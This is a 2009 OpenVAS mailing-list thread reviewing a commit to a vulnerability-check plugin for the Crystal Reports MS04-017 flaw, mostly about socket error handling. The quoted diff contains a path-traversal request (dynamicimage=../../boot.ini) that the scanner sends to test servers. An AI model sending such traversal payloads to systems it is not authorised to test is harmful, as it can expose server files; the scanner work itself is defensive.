[Openvas-devel] [Openvas-commits] r4805 -trunk/openvas-plugins/scripts

Christian Eric Edjenguele christian.edjenguele at owasp.org
Wed Sep 2 08:26:27 CEST 2009


-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Chandrashekhar B wrote:
> Hello Christian,
> 
> I have added socket functions inside if(soc) which resolves the dump errors.
> Before calling the functions such as send(), close(), there should always be
> a check soc either,
> 
> If(soc) or if(!soc) exit(0)
> 
> Also there are few more problems in the plugin,
> 
> In ln 114, you are constructing a complete HTTP GET request and then calling
> http_get() function, http_get itself will do all these, just need to pass
> the URL. In this case http_get() is returning a wrong HTTP request.

yes you're right.

thanks.

> 
> Thanks,
> Chandra.
> 
> 
> -----Original Message-----
> From: openvas-devel-bounces at wald.intevation.org
> [mailto:openvas-devel-bounces at wald.intevation.org] On Behalf Of Christian
> Eric Edjenguele
> Sent: Tuesday, September 01, 2009 9:52 PM
> To: openvas-devel at wald.intevation.org
> Subject: Re: [Openvas-devel] [Openvas-commits] r4805
> -trunk/openvas-plugins/scripts
> 
> Hi Chandra, I'm not certain about changes in this code, Jan told me
> about some errors, but does identation solves the problem ?
> 
> thanks.
> 
> scm-commit at wald.intevation.org wrote:
>> Author: chandra
>> Date: 2009-09-01 12:58:12 +0200 (Tue, 01 Sep 2009)
>> New Revision: 4805
> 
>> Modified:
>>    trunk/openvas-plugins/scripts/remote-MS04-017.nasl
>> Log:
>> Updated to resolve the issue in dump messages
> 
>> Modified: trunk/openvas-plugins/scripts/remote-MS04-017.nasl
>> ===================================================================
>> --- trunk/openvas-plugins/scripts/remote-MS04-017.nasl	2009-09-01
> 09:22:54 UTC (rev 4804)
>> +++ trunk/openvas-plugins/scripts/remote-MS04-017.nasl	2009-09-01
> 10:58:12 UTC (rev 4805)
>> @@ -108,19 +108,22 @@
>>  	foreach page (pages)
>>  	{
>>  		soc = open_sock_tcp(port);
>> -		# build the malicious request
>> -		request = page +
> '/crystalimagehandler.aspx?dynamicimage=../../../../../../../../../boot.ini'
> ;
>> +                if(soc)
>> +                {
>> +		  # build the malicious request
>> +		  request = page +
> '/crystalimagehandler.aspx?dynamicimage=../../../../../../../../../boot.ini'
> ;
> 
>> -		qry = string('GET ' + request + ' HTTP/1.0\r\n',
>> - 			  'Host: ' + h_ip + ':' + port + '\r\n\r\n');
>> +		  qry = string('GET ' + request + ' HTTP/1.0\r\n',
>> + 		  	       'Host: ' + h_ip + ':' + port + '\r\n\r\n');
> 
>> -		req = http_get(item:qry, port:port);
>> -		send(socket:soc, data: req);
>> +		  req = http_get(item:qry, port:port);
>> +		  send(socket:soc, data: req);
> 
>> -		# Get back the response
>> -		reply = recv(socket:soc, length:4096);
>> +		  # Get back the response
>> +		  reply = recv(socket:soc, length:4096);
> 
>> -		close(soc);
>> +		  close(soc);
>> +                }
> 
>>  		if(reply)
>>  		{
> 
>> _______________________________________________
>> Openvas-commits mailing list
>> Openvas-commits at wald.intevation.org
>> http://lists.wald.intevation.org/mailman/listinfo/openvas-commits
> 
> 
_______________________________________________
Openvas-devel mailing list
Openvas-devel at wald.intevation.org
http://lists.wald.intevation.org/mailman/listinfo/openvas-devel

- --
Christian Eric Edjenguele
IT Security Engineer
PGP KeyID: 0xB1654498

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.9 (GNU/Linux)
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org/

iQEcBAEBAgAGBQJKnhANAAoJENETScWxZUSY4sEIAK/RTa/g3QHLiIj8E+IC8Qcm
9AxIXsYRxRHX2j4vy8jjWWeTj2c3sY5Vfe+qJFbbNTSj6cHNQzssYY8F8ltb/r3G
wJkHSpfPyIJxRZ7ULbl6wHuAlmIikUvGKu+T51u3w6RTabTF3QQPafmLQMLh6jKd
c9QYxA+mLHrr2e/tIOBfrvK5Cu8/VLbKqv9ox8G1VQLDwWxswozc9DXc0pn4rSCk
/g5RyDQpsq/izqvJ9BnjrnY+JxsWc/rqqB3a5ndkBQNhayvmufqN+UJa6tC+Ocv1
ASdtbhMygvyCl1mPFfPGvkZ7f0MY5UbDWSYxhQYYFL24oG8y6BM3tIFZxDTzuoc=
=U5ET
-----END PGP SIGNATURE-----


More information about the Openvas-devel mailing list